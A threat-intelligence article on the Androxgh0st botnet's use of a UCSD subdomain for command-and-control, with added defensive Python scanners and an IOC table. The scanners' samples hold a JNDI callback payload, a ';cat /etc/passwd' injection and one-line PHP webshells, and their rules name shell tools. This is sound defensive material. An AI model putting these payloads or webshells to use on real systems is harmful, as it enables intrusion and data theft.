CloudSEK’s latest investigation has uncovered a significant escalation in the tactics of the Androxgh0st botnet, which has been active since at least March 2023.
The operators have now exploited a misconfigured subdomain belonging to the University of California, San Diego (UCSD), specifically the “USArhythms” portal, to host a command-and-control (C2) logger panel.
This subdomain, associated with the USA Basketball Men’s U19 National Team, was repurposed as a central hub for logging malicious botnet activity and orchestrating further attacks.
Androxgh0st is known for its rapid evolution, weaponizing a diverse set of initial access vectors (IAVs) targeting widely used platforms and frameworks.
Since August 2024, CloudSEK’s TRIAD team has tracked the botnet’s exploitation of over 20 vulnerabilities, including those in Apache Shiro, Spring Framework (Spring4Shell), WordPress plugins, and IoT devices such as Lantronix PremierWave.
The attackers leverage these vulnerabilities for remote code execution (RCE), command injection, and sensitive data exfiltration.
The C2 logs analyzed by CloudSEK reveal a broad spectrum of exploitation attempts, including JNDI and OGNL injections, Unix command injections, and targeted attacks against WordPress plugins and IoT command interfaces.
Attack Techniques
The Androxgh0st operators employ sophisticated exploitation techniques. For instance, they exploit JNDI injection vulnerabilities in Apache Shiro and FasterXML jackson-databind, enabling RCE by directing vulnerable servers to connect to attacker-controlled RMI servers.
Unix command injection is also prevalent, with payloads like “;cat /etc/passwd” used to extract sensitive user information.
The botnet targets the WordPress “Popup Maker” plugin (CVE-2019-17574) to trigger information disclosure, and leverages command injection in the Lantronix WLANScanSSID function (CVE-2021-21881) to gain remote control over IoT devices.
Attacks against Apache Struts utilize complex OGNL payloads to manipulate the Java runtime environment, while Spring Framework exploitation (Spring4Shell, CVE-2022-22965) involves tampering with class loader properties to achieve RCE.
The logs also indicate the deployment of cryptomining malware, with JSON-RPC requests fetching mining tasks from cryptocurrency pools.
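As an added example (not part of the CloudSEK report or its tooling), the Python below shows how a defender could surface the exploitation attempts described above in request records captured by a WAF or reverse proxy that logs bodies. The request dictionaries, the rule names and the bounded decode-until-stable normalisation are assumptions of the example; the sample requests are constructed, and the only real indicator in them is the oast[.]me callback host taken from the report's IOC table.

```python
"""Detection rules for the exploitation patterns named in the Androxgh0st write-up,
run over constructed sample requests. Added example; not CloudSEK's tooling."""
import re
from urllib.parse import unquote_plus

# Each rule is applied to the fully URL-decoded, lower-cased request text (URI + body).
RULES = {
    # JNDI lookup strings pointing at RMI/LDAP/DNS listeners (Shiro, jackson-databind style)
    "jndi_injection": re.compile(r"\$\{jndi:(rmi|ldap|ldaps|dns)://"),
    # OGNL expression marker used in payloads against Apache Struts
    "ognl_injection": re.compile(r"%\{\s*\(?\s*#"),
    # Spring4Shell (CVE-2022-22965) binds request parameters onto class loader properties
    "spring4shell_classloader": re.compile(r"class\.module\.classloader"),
    # Unix command injection: a shell separator followed by a common binary
    "unix_command_injection": re.compile(r"(;|\|\|?|&&|`)\s*(cat|id|wget|curl|sh|bash|nc)\b"),
    # Out-of-band callback hosts of the kind listed in the report's IOC table
    "oast_callback": re.compile(r"\b[a-z0-9]{20,}\.oast\.(me|today|live|site|fun)\b"),
}


def normalise(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text.lower()


def scan_request(request: dict) -> list:
    """Return the names of every rule the request matches, in rule order."""
    haystack = normalise(request.get("uri", "") + "\n" + request.get("body", ""))
    return [name for name, rx in RULES.items() if rx.search(haystack)]


def triage(requests) -> dict:
    """Map source address -> matched rules for every request that hit at least one rule."""
    hits = {}
    for req in requests:
        matched = scan_request(req)
        if matched:
            hits.setdefault(req["src"], []).extend(matched)
    return hits


# Constructed sample requests (assumed WAF/proxy records); not from the report's C2 logs.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "GET", "uri": "/index.php?page=about", "body": ""},
    {"src": "10.0.0.6", "method": "POST", "uri": "/login",
     "body": "user=%24%7Bjndi%3Armi%3A%2F%2Fcv032vemsb87jtt2p11g5h8xztka6kruj.oast.me%2Fa%7D"},
    {"src": "10.0.0.7", "method": "GET",
     "uri": "/cgi-bin/status?host=127.0.0.1;cat%20/etc/passwd", "body": ""},
    {"src": "10.0.0.8", "method": "POST", "uri": "/app/form",
     "body": "class.module.classLoader.x=1"},  # truncated, constructed parameter name
    {"src": "10.0.0.9", "method": "GET",
     "uri": "/struts/action?name=%25%7B%28%23foo%3D1%29%7D", "body": ""},  # double-encoded
]

if __name__ == "__main__":
    for src, rules in triage(SAMPLE_REQUESTS).items():
        print(f"{src}: {', '.join(rules)}")
```

The rules are deliberately coarse: they are meant as a first-pass filter over request logs whose hits are reviewed, not as a blocking ruleset, and the decode loop is what keeps the OGNL sample from slipping past the `%{` check when it arrives double-encoded.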
Webshell Arsenal
Persistence is maintained through the deployment of multiple webshell variants, including:
- abuok.php: Utilizes hex2bin and eval obfuscation for remote code execution via POST requests.
- myabu.php: Employs ROT13 obfuscation, enabling arbitrary code execution.
- scwj.php: Functions as a file upload backdoor for further payload delivery.
- baocun.php: Acts as a code dropper, writing attacker-supplied scripts to disk.
These webshells are designed to evade detection and provide attackers with ongoing access for lateral movement and additional exploitation.
The compromise of academic infrastructure for C2 hosting exposes sensitive data, facilitates further malware distribution, and enables cryptomining operations.
The misuse of trusted university domains increases the risk of brand damage and regulatory repercussions.
CloudSEK recommends immediate patching of affected systems, strict firewall controls on RMI/LDAP/JNDI traffic, regular audits for suspicious PHP files, and the deployment of web application firewalls (WAF) or runtime application self-protection (RASP) solutions.
Detection strategies should focus on identifying obfuscated webshells, suspicious POST parameters, and anomalous outbound traffic to known malicious domains.
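As an added example (not CloudSEK's tooling), the Python below implements two of the detection strategies just described: a source-pattern scan for the obfuscation tricks the report attributes to each webshell (hex2bin plus eval, ROT13, upload backdoor, code dropper), combined with a lookup against the MD5 hashes and defanged hosts from the report's IOC table for file and outbound-traffic matching. The pattern names, the refanging helper and the PHP samples are assumptions of the example; the samples are constructed one-line stand-ins, not the real webshells, so only the hash table and host list are taken from the page.

```python
"""Scan PHP files for the obfuscation techniques attributed to the Androxgh0st webshells
and match artefacts against the published IOCs. Added example; not CloudSEK's tooling.
The sample files below are constructed stand-ins, not the real webshells."""
import hashlib
import re

# Source patterns mirroring the report's description of each webshell variant.
WEBSHELL_PATTERNS = {
    "eval_hex2bin": re.compile(r"\beval\s*\(\s*hex2bin\s*\(", re.I),            # abuok.php style
    "eval_rot13": re.compile(r"\beval\s*\(\s*str_rot13\s*\(", re.I),            # myabu.php style
    "upload_backdoor": re.compile(r"\bmove_uploaded_file\s*\(\s*\$_FILES\b", re.I),  # scwj.php style
    "dropper": re.compile(r"\bfile_put_contents\s*\([^;]*\$_(POST|GET|REQUEST)\b", re.I),  # baocun.php
    # generic: a code-execution sink fed straight from a request superglobal
    "exec_sink_from_request": re.compile(
        r"\b(eval|assert|system|passthru|shell_exec)\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
}

# IOCs as published in the report: MD5 hashes of the webshells and defanged C2/callback hosts.
KNOWN_MD5 = {
    "9e1fb14b747b5bdaf817845007a47752": "abuok.php",
    "d6efe92ca18570f940a720e51af77f72": "myabu.php",
    "f65749ddf93e890b48b3bde77b1302aa": "scwj.php",
    "5a12416857547341493b436299e9b886": "baocun.php",
}
DEFANGED_HOSTS = [
    "cv032vemsb87jtt2p11g5h8xztka6kruj[.]oast[.]me",
    "d0i0taritt4c9dh9hln06thpknw9dcqhu[.]oast[.]today",
    "ch14vjilcoecm8580ft0g6xsmrkewgwro[.]oast[.]live",
    "chcmp35oujaubpa7e86g1wz9dypg9oc67[.]oast[.]site",
    "chi2p4r4bcdfd791dh50c6dpgu4h9rdhc[.]oast[.]fun",
    "cj7409i4t88ukb0publgakedcbwnz7nzy[.]oast[.]live",
    "cv032vemsb87jtt2p11gwf68p1xw7rgtk[.]oast[.]me",
    "cj7409i4t88ukb0publgjtkyt534mnrby[.]oast[.]live",
    "chke3769l5m6jbj8hq90fu71kckky5x63[.]oast[.]fun",
    "185.172.128[.]93",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable hostname or IP."""
    return indicator.replace("[.]", ".").lower()


KNOWN_HOSTS = {refang(h) for h in DEFANGED_HOSTS}


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def scan_php_source(source: str) -> list:
    """Names of the webshell patterns present in a PHP source text, in definition order."""
    return [name for name, rx in WEBSHELL_PATTERNS.items() if rx.search(source)]


def classify_file(name: str, data: bytes) -> dict:
    """Combine a hash lookup against the published IOCs with source pattern matching."""
    digest = md5_hex(data)
    patterns = scan_php_source(data.decode("utf-8", errors="replace"))
    return {"file": name, "md5": digest, "known_as": KNOWN_MD5.get(digest),
            "patterns": patterns, "suspicious": bool(patterns) or digest in KNOWN_MD5}


def suspicious_files(files: dict) -> list:
    """Classify every (name -> bytes) entry and keep only the suspicious ones."""
    return [r for r in (classify_file(n, d) for n, d in files.items()) if r["suspicious"]]


def match_outbound(hosts) -> list:
    """Hosts seen in DNS or proxy logs that equal a published IOC, or that sit under the
    same OAST callback domains the report lists (assumed worth flagging on a server)."""
    hits = []
    for h in hosts:
        h = h.lower().rstrip(".")
        if h in KNOWN_HOSTS or re.search(r"\.oast\.(me|today|live|site|fun)$", h):
            hits.append(h)
    return hits


# Constructed samples standing in for files found during a PHP audit.
SAMPLE_FILES = {
    "index.php": b"<?php echo 'hello'; ?>",
    "cache_a.php": b"<?php eval(hex2bin($_POST['d'])); ?>",
    "cache_b.php": b"<?php eval(str_rot13($_REQUEST['q'])); ?>",
    "up.php": b"<?php move_uploaded_file($_FILES['f']['tmp_name'], 'x.php'); ?>",
    "save.php": b"<?php file_put_contents($_GET['n'], $_POST['c']); ?>",
}

if __name__ == "__main__":
    for r in suspicious_files(SAMPLE_FILES):
        print(r["file"], r["known_as"] or "-", ", ".join(r["patterns"]))
```

Hash matching only catches the exact files from the report, so the pattern scan is what carries the audit once the operators recompile or rename their shells; the generic sink rule is there because the four named variants all share the same shape of "request input straight into an execution or file-write function".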
Indicators of Compromise (IOC)
Indicator | Type | Comments |
---|---|---|
cv032vemsb87jtt2p11g5h8xztka6kruj[.]oast[.]me | Subdomain | General C2 activity |
d0i0taritt4c9dh9hln06thpknw9dcqhu[.]oast[.]today | Subdomain | General C2 activity |
ch14vjilcoecm8580ft0g6xsmrkewgwro[.]oast[.]live | Subdomain | General C2 activity |
chcmp35oujaubpa7e86g1wz9dypg9oc67[.]oast[.]site | Subdomain | General C2 activity |
chi2p4r4bcdfd791dh50c6dpgu4h9rdhc[.]oast[.]fun | Subdomain | General C2 activity |
cj7409i4t88ukb0publgakedcbwnz7nzy[.]oast[.]live | Subdomain | Lantronix WLANScanSSID Command Injection |
cv032vemsb87jtt2p11gwf68p1xw7rgtk[.]oast[.]me | Subdomain | Fastjson-v1.2.47 RCE |
cj7409i4t88ukb0publgjtkyt534mnrby[.]oast[.]live | Subdomain | Spring4Shell exploitation |
chke3769l5m6jbj8hq90fu71kckky5x63[.]oast[.]fun | Subdomain | Apache Shiro, FasterXML jackson-databind |
185.172.128[.]93 | IP Address | CVE-2024-4577 exploitation |
9e1fb14b747b5bdaf817845007a47752 | MD5 Hash | Webshell (abuok.php) |
d6efe92ca18570f940a720e51af77f72 | MD5 Hash | Webshell (myabu.php) |
f65749ddf93e890b48b3bde77b1302aa | MD5 Hash | Webshell (scwj.php) |
5a12416857547341493b436299e9b886 | MD5 Hash | Webshell (baocun.php) |